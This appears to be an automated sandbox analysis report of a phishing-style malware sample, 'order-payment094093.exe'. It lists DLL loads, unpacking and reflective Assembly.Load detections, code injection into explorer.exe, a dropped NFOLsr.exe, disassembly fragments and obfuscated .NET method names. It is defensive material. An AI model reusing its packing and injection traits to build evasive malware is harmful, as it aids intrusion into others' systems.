Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: aepic.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll

Source: C:\Users\user\Desktop\order-payment094093.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\order-payment094093.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: order-payment094093.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: order-payment094093.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: explorer.pdbUGP source: order-payment094093.exe, 00000009.00000002.2202520951.0000000002F00000.00000040.10000000.00040000.00000000.sdmp, explorer.exe, 0000000D.00000002.3315058367.0000000000A90000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: netsh.pdb source: explorer.exe, 0000000D.00000003.2332553204.0000000003371000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.3317370398.0000000003385000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2332553204.0000000003382000.00000004.00000020.00020000.00000000.sdmp, NFOLsr.exe, 00000012.00000002.2358827097.0000000000E8D000.00000004.00000020.00020000.00000000.sdmp, NFOLsr.exe, 00000012.00000002.2359854782.0000000001220000.00000040.10000000.00040000.00000000.sdmp, NFOLsr.exe, 00000012.00000002.2358827097.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000016.00000002.2359821107.0000000000A60000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: order-payment094093.exe, 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.3318733475.000000000543E000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2202446701.00000000050F1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.3318733475.00000000052A0000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2197656658.0000000004EF1000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000016.00000003.2357151463.0000000003592000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000016.00000003.2358821088.0000000003744000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000016.00000002.2360599278.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000016.00000002.2360599278.0000000003A8E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: netsh.pdbGCTL source: explorer.exe, 0000000D.00000003.2332553204.0000000003371000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.3317370398.0000000003385000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2332553204.0000000003382000.00000004.00000020.00020000.00000000.sdmp, NFOLsr.exe, 00000012.00000002.2358827097.0000000000E8D000.00000004.00000020.00020000.00000000.sdmp, NFOLsr.exe, 00000012.00000002.2359854782.0000000001220000.00000040.10000000.00040000.00000000.sdmp, NFOLsr.exe, 00000012.00000002.2358827097.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000016.00000002.2359821107.0000000000A60000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: order-payment094093.exe, order-payment094093.exe, 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, explorer.exe, 0000000D.00000002.3318733475.000000000543E000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2202446701.00000000050F1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.3318733475.00000000052A0000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2197656658.0000000004EF1000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000016.00000003.2357151463.0000000003592000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000016.00000003.2358821088.0000000003744000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000016.00000002.2360599278.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000016.00000002.2360599278.0000000003A8E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: explorer.pdb source: order-payment094093.exe, 00000009.00000002.2202520951.0000000002F00000.00000040.10000000.00040000.00000000.sdmp, explorer.exe, 0000000D.00000002.3315058367.0000000000A90000.00000040.80000000.00040000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\order-payment094093.exe

Unpacked PE file: 0.2.order-payment094093.exe.b30000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\order-payment094093.exe

Unpacked PE file: 0.2.order-payment094093.exe.b30000.0.unpack

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.order-payment094093.exe.9770000.9.raw.unpack, XG.cs

.Net Code: Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777298)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777243)),Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777254))})

.NET source code contains potential unpacker

Source: 0.2.order-payment094093.exe.7c40000.7.raw.unpack, -.cs	.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: 0.2.order-payment094093.exe.46b9990.4.raw.unpack, -.cs	.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: 0.2.order-payment094093.exe.4ae7560.5.raw.unpack, KxBlY6Wka4Q7j64Dbl.cs	.Net Code: PuQ4OhbECx System.Reflection.Assembly.Load(byte[])
Source: 0.2.order-payment094093.exe.9fc0000.10.raw.unpack, KxBlY6Wka4Q7j64Dbl.cs	.Net Code: PuQ4OhbECx System.Reflection.Assembly.Load(byte[])
Source: 0.2.order-payment094093.exe.4a77940.6.raw.unpack, KxBlY6Wka4Q7j64Dbl.cs	.Net Code: PuQ4OhbECx System.Reflection.Assembly.Load(byte[])

Source: order-payment094093.exe

Static PE information: 0x9B507372 [Sun Jul 28 00:55:14 2052 UTC]

Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 0_2_0A045F10 pushad ; ret	0_2_0A045F11
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 0_2_0A04044C push ds; ret	0_2_0A04044D
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0041D4B5 push eax; ret	9_2_0041D508
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0041D56C push eax; ret	9_2_0041D572
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0041D502 push eax; ret	9_2_0041D508
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0041D50B push eax; ret	9_2_0041D572
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_00417D11 push esi; iretd	9_2_00417D14
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_00416698 push 3C7FC06Ch; ret	9_2_0041669D
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_011F225F pushad ; ret	9_2_011F27F9
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_011F27FA pushad ; ret	9_2_011F27F9
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012209AD push ecx; mov dword ptr [esp], ecx	9_2_012209B6
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_011F283D push eax; iretd	9_2_011F2858
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_011F1368 push eax; iretd	9_2_011F1369
Source: C:\Windows\explorer.exe	Code function: 10_2_100799B5 push esp; retn 0000h	10_2_10079AE7
Source: C:\Windows\explorer.exe	Code function: 10_2_10079B02 push esp; retn 0000h	10_2_10079B03
Source: C:\Windows\explorer.exe	Code function: 10_2_10079B1E push esp; retn 0000h	10_2_10079B1F
Source: C:\Windows\explorer.exe	Code function: 10_2_106E79B5 push esp; retn 0000h	10_2_106E7AE7
Source: C:\Windows\explorer.exe	Code function: 10_2_106E7B02 push esp; retn 0000h	10_2_106E7B03
Source: C:\Windows\explorer.exe	Code function: 10_2_106E7B1E push esp; retn 0000h	10_2_106E7B1F
Source: C:\Windows\explorer.exe	Code function: 10_2_111FCB1E push esp; retn 0000h	10_2_111FCB1F
Source: C:\Windows\explorer.exe	Code function: 10_2_111FCB02 push esp; retn 0000h	10_2_111FCB03
Source: C:\Windows\explorer.exe	Code function: 10_2_111FC9B5 push esp; retn 0000h	10_2_111FCAE7
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Code function: 11_2_05816CD4 push esp; retf	11_2_05819E5E
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Code function: 11_2_0581E5F0 pushfd ; retf	11_2_0581E5FA
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Code function: 11_2_05816CA4 push ebx; retf	11_2_05816CD2
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Code function: 11_2_05816CF3 push edi; retf	11_2_05816D02
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Code function: 11_2_05819548 push esp; retf	11_2_05819552
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Code function: 11_2_0581F1A8 pushfd ; retf	11_2_0581F1AE
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Code function: 11_2_0581F090 pushfd ; retf	11_2_0581F096
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Code function: 11_2_05819F76 push esp; retf	11_2_05819F86
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_052A27FA pushad ; ret	13_2_052A27F9

Source: order-payment094093.exe	Static PE information: section name: .text entropy: 7.890018158963495
Source: NFOLsr.exe.0.dr	Static PE information: section name: .text entropy: 7.890018158963495

Source: 0.2.order-payment094093.exe.4ae7560.5.raw.unpack, XGuUXrtsXAhhdiQKZe.cs	High entropy of concatenated method names: 'fn9TAhtmWSWVFbfgJTZ', 'wkrKCstHsjoM7q1uYHg', 'lc9I1bxRLa', 'by9IMNO96S', 'lQJIydQ4cp', 'mxlKekt3Ke6i067IMEl', 'GnKU4Rt4sU1seIy0Ybm'
Source: 0.2.order-payment094093.exe.4ae7560.5.raw.unpack, GIMunT4iYk3xx1ugU8.cs	High entropy of concatenated method names: 'eCfsDPYYQ5', 'QkcsWvPJXM', 'mY4sBrWYfQ', 'JaCsA4rT9p', 'ApQswtiXFI', 'FXXs3Yv7ku', 'zk4FieGvgfK8xBAloC', 'IT6xp1p0t9ZFOXFuAd', 'I8gss9uSwT', 'i7qsLwOwXI'
Source: 0.2.order-payment094093.exe.4ae7560.5.raw.unpack, knKmAHniGL4bRURurf.cs	High entropy of concatenated method names: 'ossMsHBk53', 'eyCMLaNaIU', 'SIZM45YFt9', 'L9lMCJmDIg', 'LoZMv4aH5o', 'FdMM0SWKZq', 'MZkMIefwIF', 'U8p1TRI3xW', 'rHn16Tn2iZ', 'qbR1QaTBoA'
Source: 0.2.order-payment094093.exe.4ae7560.5.raw.unpack, n1tF4W6Sc8lEbmUOSk.cs	High entropy of concatenated method names: 'b9C1C9yABd', 'dDU1v4RRfi', 'yTU1Fotau5', 'zqK10RTd2J', 'dF21IhXX1q', 'eOP1DLK1so', 'Gj81WuddXP', 'PKb1lXNCNp', 'AWB1BKeNTH', 'FOl1AOFvoF'
Source: 0.2.order-payment094093.exe.4ae7560.5.raw.unpack, HmRFC2sLQkD7yrw0rjl.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'PKeyUNhdcb', 'iVsyh3sRZ1', 'RKCyZU9Pgl', 'y7WyPPU2MO', 'oSnyiueRWu', 'YAayVcaf8b', 'GhfyT0yVek'
Source: 0.2.order-payment094093.exe.4ae7560.5.raw.unpack, VbkTsGZTjb6Kr4Bahu.cs	High entropy of concatenated method names: 'ToString', 'nyu3fRhFj8', 'IE23tJ8FZE', 'mBV38wNhZ9', 'hXg3YZ1Zbt', 'gd03X6bFxx', 'A9N3GgNi8r', 'vn13k4NWAR', 'oMG3u1jBFc', 'nQT3aPTthS'
Source: 0.2.order-payment094093.exe.4ae7560.5.raw.unpack, wmvbqJaiMeWxHytBI0.cs	High entropy of concatenated method names: 'WmwDrr8THU', 'sA6Db6xXZH', 'lZbDO3fYS2', 'fOdD2KgTlD', 'JR9DjbOfuJ', 'DqBDc4DdDZ', 'tobDmFPBJq', 'm8BDpYuHDO', 'hjmDowTDGa', 'X5AD529TpQ'
Source: 0.2.order-payment094093.exe.4ae7560.5.raw.unpack, Qlj30HVqFZYsUdlPE7.cs	High entropy of concatenated method names: 'CQwq6yHdxy', 'NtvqndR5dF', 'i9g1xbOlKe', 'JfX1sIXGw8', 'nADqfA4ZEo', 'EPpqRA00Dx', 'YQjqJkrAsa', 'x6TqUwcscJ', 'iLwqhnSSth', 'yeyqZav8Ks'
Source: 0.2.order-payment094093.exe.4ae7560.5.raw.unpack, bJ74aLkRdL2lFP3dCO.cs	High entropy of concatenated method names: 'In0DCX6Xl5', 'YGaDFCuEBv', 'Q9iDIDwd2V', 'ngUInDFWOp', 'vaZIzH5mQu', 'NS0DxxnSA1', 'OhfDsQpu5w', 'mm2DgrTe2V', 'd9kDLA5t0f', 'U0XD4qCnIg'
Source: 0.2.order-payment094093.exe.4ae7560.5.raw.unpack, nAVntjJpJJnTSZHRaQ.cs	High entropy of concatenated method names: 'JnqHpxHUnh', 'KR6HoUaIWq', 'sodHeW3lPq', 'cOxHtS55Ko', 'TI1HYU9gc9', 'zuRHXOS8oi', 'aEIHkwNfWO', 's3LHuqNr2w', 'RAaH9qxAde', 'oyxHfQsSiG'
Source: 0.2.order-payment094093.exe.4ae7560.5.raw.unpack, c9RSAhQwebH3jjb38v.cs	High entropy of concatenated method names: 'pSp1ee5KFh', 'oKe1tqYB5d', 'VmV18DiION', 'KoX1Yq1kqv', 'RcG1UpbXwN', 'zas1X40Ru7', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.order-payment094093.exe.4ae7560.5.raw.unpack, v2maH3vO4NWxGXMerY.cs	High entropy of concatenated method names: 'Dispose', 'f3DsQMa1i0', 'tlsgtNMi0t', 'URDxxVtAwq', 'eH1sntF4WS', 'C8lszEbmUO', 'ProcessDialogKey', 'ekLgx9RSAh', 'oebgsH3jjb', 'p8vggWnKmA'
Source: 0.2.order-payment094093.exe.4ae7560.5.raw.unpack, KxBlY6Wka4Q7j64Dbl.cs	High entropy of concatenated method names: 'JjmLSLnd4R', 'i11LCquJDY', 'a3tLvCF0EB', 'jbTLF1iigZ', 'LR1L0HaEKb', 'kMVLIUDWDs', 'TGmLDVnudN', 'KcjLWhpnrE', 'G83LlO4Mwo', 'NJ9LBR1Etl'
Source: 0.2.order-payment094093.exe.4ae7560.5.raw.unpack, zlS2CaUNoZt65r5stX.cs	High entropy of concatenated method names: 'vmyw9S46ln', 'BLmwRe2oMS', 'aOUwUdZ8Zx', 'albwhuyA9S', 'NIMwteymlr', 'hcCw8LRUNY', 'SQ6wYJAkZK', 'GcxwXKbRwU', 's9hwG0kBWH', 'G8iwkkUys8'
Source: 0.2.order-payment094093.exe.4ae7560.5.raw.unpack, xT9pNP5WWLchG2pQti.cs	High entropy of concatenated method names: 'L4s0jBkOER', 'eQ60mYZ4Rn', 'anpF81Oy4b', 'VQvFYhwutZ', 'ysMFXTNuvn', 'Ya9FGdoJpf', 'XaSFkoNBEH', 'BggFublKR8', 'RTWFaR2ODq', 'HNbF9qhxw2'
Source: 0.2.order-payment094093.exe.4ae7560.5.raw.unpack, qLT0uBoY4rWYfQXaC4.cs	High entropy of concatenated method names: 'mtuF2EWwQn', 'Vu1Fc949oV', 'LnAFpbcZMm', 'NWmFoRHp02', 'B4SFwCnZLx', 'SYhF3tbtLE', 'auVFq0Qcs9', 'eVsF16mpNA', 'r0bFMCtEna', 'CLuFyxjs9G'
Source: 0.2.order-payment094093.exe.4ae7560.5.raw.unpack, OPYYQ5pJkcvPJXM8Oe.cs	High entropy of concatenated method names: 'JlmvUUfevB', 'RUdvhxxp8b', 'VMbvZnGwcf', 'xEfvP4YNOh', 'byVviVGU7f', 'W0KvVNCOJr', 'xwHvT14WDB', 'Oejv6Z8lcO', 't88vQ0XyQe', 'YjtvnJVykL'
Source: 0.2.order-payment094093.exe.4ae7560.5.raw.unpack, z5SciPzwWtS4eXFgWC.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Pv1MHmk3oY', 'SHvMwgyxlU', 'zLbM3SuwOE', 'o6RMq97gp6', 'zbXM1pbWBr', 'U8gMMdfAXv', 'HycMyn1gPk'
Source: 0.2.order-payment094093.exe.4ae7560.5.raw.unpack, JFIeXXeYv7kuXqVyGk.cs	High entropy of concatenated method names: 'x48ISMimpo', 'f45Ivd0Joo', 'zZiI0cWwcS', 'pv7IDWD0YU', 'DwvIWO9gjv', 'EZx0i05nG0', 'V280VMXL4d', 'iWC0TwxQSl', 'h5c063fsqe', 'iWO0QKH34q'
Source: 0.2.order-payment094093.exe.4ae7560.5.raw.unpack, vH7PRfgnydZNX4Yejl.cs	High entropy of concatenated method names: 'fFqORAMsc', 'NYU27LXB0', 'kGGcJAxqp', 'fJkmT7mWB', 'XcKo00Uno', 'QvA5OPIil', 'M8Re3ys1JuEZVQf29p', 'EnMkKFgm8yFi7cdWlV', 'F051K86jn', 'JAoyDyiUZ'
Source: 0.2.order-payment094093.exe.4ae7560.5.raw.unpack, lZlXECsxIReyoBC4FkM.cs	High entropy of concatenated method names: 'IVoMrIB8DF', 'AItMbUmoYl', 'OiSMOKVe2n', 'FyiM2OuasR', 'TtwMjh0b7S', 'fU3McWtTka', 'iWdMmjtg8Q', 'kbjMpb0EDh', 'toWMoMqKXB', 'nCmM5t2x96'
Source: 0.2.order-payment094093.exe.4ae7560.5.raw.unpack, AgfTn8PZPZostMg4gR.cs	High entropy of concatenated method names: 'gEEqBtkhrp', 'lSMqAWaJiT', 'ToString', 'CuQqCaUPdY', 'kFrqvLZJ3i', 'Jt6qFbDJB5', 'DRIq0OQJpv', 'efvqI9K8cO', 'YX9qDgFWZJ', 'C0rqWLcyIl'
Source: 0.2.order-payment094093.exe.4ae7560.5.raw.unpack, jHUH92F5x82eT8kue8.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'yoUgQnd331', 'U6RgnIivXP', 'QqNgzfOIlK', 'SFsLxw1iVY', 'vCkLsvSnoD', 'N9ULgFSt19', 'HYcLL8ixrI', 'LaIq63hYpf5r83arEv3'
Source: 0.2.order-payment094093.exe.9fc0000.10.raw.unpack, XGuUXrtsXAhhdiQKZe.cs	High entropy of concatenated method names: 'fn9TAhtmWSWVFbfgJTZ', 'wkrKCstHsjoM7q1uYHg', 'lc9I1bxRLa', 'by9IMNO96S', 'lQJIydQ4cp', 'mxlKekt3Ke6i067IMEl', 'GnKU4Rt4sU1seIy0Ybm'
Source: 0.2.order-payment094093.exe.9fc0000.10.raw.unpack, GIMunT4iYk3xx1ugU8.cs	High entropy of concatenated method names: 'eCfsDPYYQ5', 'QkcsWvPJXM', 'mY4sBrWYfQ', 'JaCsA4rT9p', 'ApQswtiXFI', 'FXXs3Yv7ku', 'zk4FieGvgfK8xBAloC', 'IT6xp1p0t9ZFOXFuAd', 'I8gss9uSwT', 'i7qsLwOwXI'
Source: 0.2.order-payment094093.exe.9fc0000.10.raw.unpack, knKmAHniGL4bRURurf.cs	High entropy of concatenated method names: 'ossMsHBk53', 'eyCMLaNaIU', 'SIZM45YFt9', 'L9lMCJmDIg', 'LoZMv4aH5o', 'FdMM0SWKZq', 'MZkMIefwIF', 'U8p1TRI3xW', 'rHn16Tn2iZ', 'qbR1QaTBoA'
Source: 0.2.order-payment094093.exe.9fc0000.10.raw.unpack, n1tF4W6Sc8lEbmUOSk.cs	High entropy of concatenated method names: 'b9C1C9yABd', 'dDU1v4RRfi', 'yTU1Fotau5', 'zqK10RTd2J', 'dF21IhXX1q', 'eOP1DLK1so', 'Gj81WuddXP', 'PKb1lXNCNp', 'AWB1BKeNTH', 'FOl1AOFvoF'
Source: 0.2.order-payment094093.exe.9fc0000.10.raw.unpack, HmRFC2sLQkD7yrw0rjl.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'PKeyUNhdcb', 'iVsyh3sRZ1', 'RKCyZU9Pgl', 'y7WyPPU2MO', 'oSnyiueRWu', 'YAayVcaf8b', 'GhfyT0yVek'
Source: 0.2.order-payment094093.exe.9fc0000.10.raw.unpack, VbkTsGZTjb6Kr4Bahu.cs	High entropy of concatenated method names: 'ToString', 'nyu3fRhFj8', 'IE23tJ8FZE', 'mBV38wNhZ9', 'hXg3YZ1Zbt', 'gd03X6bFxx', 'A9N3GgNi8r', 'vn13k4NWAR', 'oMG3u1jBFc', 'nQT3aPTthS'
Source: 0.2.order-payment094093.exe.9fc0000.10.raw.unpack, wmvbqJaiMeWxHytBI0.cs	High entropy of concatenated method names: 'WmwDrr8THU', 'sA6Db6xXZH', 'lZbDO3fYS2', 'fOdD2KgTlD', 'JR9DjbOfuJ', 'DqBDc4DdDZ', 'tobDmFPBJq', 'm8BDpYuHDO', 'hjmDowTDGa', 'X5AD529TpQ'
Source: 0.2.order-payment094093.exe.9fc0000.10.raw.unpack, Qlj30HVqFZYsUdlPE7.cs	High entropy of concatenated method names: 'CQwq6yHdxy', 'NtvqndR5dF', 'i9g1xbOlKe', 'JfX1sIXGw8', 'nADqfA4ZEo', 'EPpqRA00Dx', 'YQjqJkrAsa', 'x6TqUwcscJ', 'iLwqhnSSth', 'yeyqZav8Ks'
Source: 0.2.order-payment094093.exe.9fc0000.10.raw.unpack, bJ74aLkRdL2lFP3dCO.cs	High entropy of concatenated method names: 'In0DCX6Xl5', 'YGaDFCuEBv', 'Q9iDIDwd2V', 'ngUInDFWOp', 'vaZIzH5mQu', 'NS0DxxnSA1', 'OhfDsQpu5w', 'mm2DgrTe2V', 'd9kDLA5t0f', 'U0XD4qCnIg'
Source: 0.2.order-payment094093.exe.9fc0000.10.raw.unpack, nAVntjJpJJnTSZHRaQ.cs	High entropy of concatenated method names: 'JnqHpxHUnh', 'KR6HoUaIWq', 'sodHeW3lPq', 'cOxHtS55Ko', 'TI1HYU9gc9', 'zuRHXOS8oi', 'aEIHkwNfWO', 's3LHuqNr2w', 'RAaH9qxAde', 'oyxHfQsSiG'
Source: 0.2.order-payment094093.exe.9fc0000.10.raw.unpack, c9RSAhQwebH3jjb38v.cs	High entropy of concatenated method names: 'pSp1ee5KFh', 'oKe1tqYB5d', 'VmV18DiION', 'KoX1Yq1kqv', 'RcG1UpbXwN', 'zas1X40Ru7', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.order-payment094093.exe.9fc0000.10.raw.unpack, v2maH3vO4NWxGXMerY.cs	High entropy of concatenated method names: 'Dispose', 'f3DsQMa1i0', 'tlsgtNMi0t', 'URDxxVtAwq', 'eH1sntF4WS', 'C8lszEbmUO', 'ProcessDialogKey', 'ekLgx9RSAh', 'oebgsH3jjb', 'p8vggWnKmA'
Source: 0.2.order-payment094093.exe.9fc0000.10.raw.unpack, KxBlY6Wka4Q7j64Dbl.cs	High entropy of concatenated method names: 'JjmLSLnd4R', 'i11LCquJDY', 'a3tLvCF0EB', 'jbTLF1iigZ', 'LR1L0HaEKb', 'kMVLIUDWDs', 'TGmLDVnudN', 'KcjLWhpnrE', 'G83LlO4Mwo', 'NJ9LBR1Etl'
Source: 0.2.order-payment094093.exe.9fc0000.10.raw.unpack, zlS2CaUNoZt65r5stX.cs	High entropy of concatenated method names: 'vmyw9S46ln', 'BLmwRe2oMS', 'aOUwUdZ8Zx', 'albwhuyA9S', 'NIMwteymlr', 'hcCw8LRUNY', 'SQ6wYJAkZK', 'GcxwXKbRwU', 's9hwG0kBWH', 'G8iwkkUys8'
Source: 0.2.order-payment094093.exe.9fc0000.10.raw.unpack, xT9pNP5WWLchG2pQti.cs	High entropy of concatenated method names: 'L4s0jBkOER', 'eQ60mYZ4Rn', 'anpF81Oy4b', 'VQvFYhwutZ', 'ysMFXTNuvn', 'Ya9FGdoJpf', 'XaSFkoNBEH', 'BggFublKR8', 'RTWFaR2ODq', 'HNbF9qhxw2'
Source: 0.2.order-payment094093.exe.9fc0000.10.raw.unpack, qLT0uBoY4rWYfQXaC4.cs	High entropy of concatenated method names: 'mtuF2EWwQn', 'Vu1Fc949oV', 'LnAFpbcZMm', 'NWmFoRHp02', 'B4SFwCnZLx', 'SYhF3tbtLE', 'auVFq0Qcs9', 'eVsF16mpNA', 'r0bFMCtEna', 'CLuFyxjs9G'
Source: 0.2.order-payment094093.exe.9fc0000.10.raw.unpack, OPYYQ5pJkcvPJXM8Oe.cs	High entropy of concatenated method names: 'JlmvUUfevB', 'RUdvhxxp8b', 'VMbvZnGwcf', 'xEfvP4YNOh', 'byVviVGU7f', 'W0KvVNCOJr', 'xwHvT14WDB', 'Oejv6Z8lcO', 't88vQ0XyQe', 'YjtvnJVykL'
Source: 0.2.order-payment094093.exe.9fc0000.10.raw.unpack, z5SciPzwWtS4eXFgWC.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Pv1MHmk3oY', 'SHvMwgyxlU', 'zLbM3SuwOE', 'o6RMq97gp6', 'zbXM1pbWBr', 'U8gMMdfAXv', 'HycMyn1gPk'
Source: 0.2.order-payment094093.exe.9fc0000.10.raw.unpack, JFIeXXeYv7kuXqVyGk.cs	High entropy of concatenated method names: 'x48ISMimpo', 'f45Ivd0Joo', 'zZiI0cWwcS', 'pv7IDWD0YU', 'DwvIWO9gjv', 'EZx0i05nG0', 'V280VMXL4d', 'iWC0TwxQSl', 'h5c063fsqe', 'iWO0QKH34q'
Source: 0.2.order-payment094093.exe.9fc0000.10.raw.unpack, vH7PRfgnydZNX4Yejl.cs	High entropy of concatenated method names: 'fFqORAMsc', 'NYU27LXB0', 'kGGcJAxqp', 'fJkmT7mWB', 'XcKo00Uno', 'QvA5OPIil', 'M8Re3ys1JuEZVQf29p', 'EnMkKFgm8yFi7cdWlV', 'F051K86jn', 'JAoyDyiUZ'
Source: 0.2.order-payment094093.exe.9fc0000.10.raw.unpack, lZlXECsxIReyoBC4FkM.cs	High entropy of concatenated method names: 'IVoMrIB8DF', 'AItMbUmoYl', 'OiSMOKVe2n', 'FyiM2OuasR', 'TtwMjh0b7S', 'fU3McWtTka', 'iWdMmjtg8Q', 'kbjMpb0EDh', 'toWMoMqKXB', 'nCmM5t2x96'
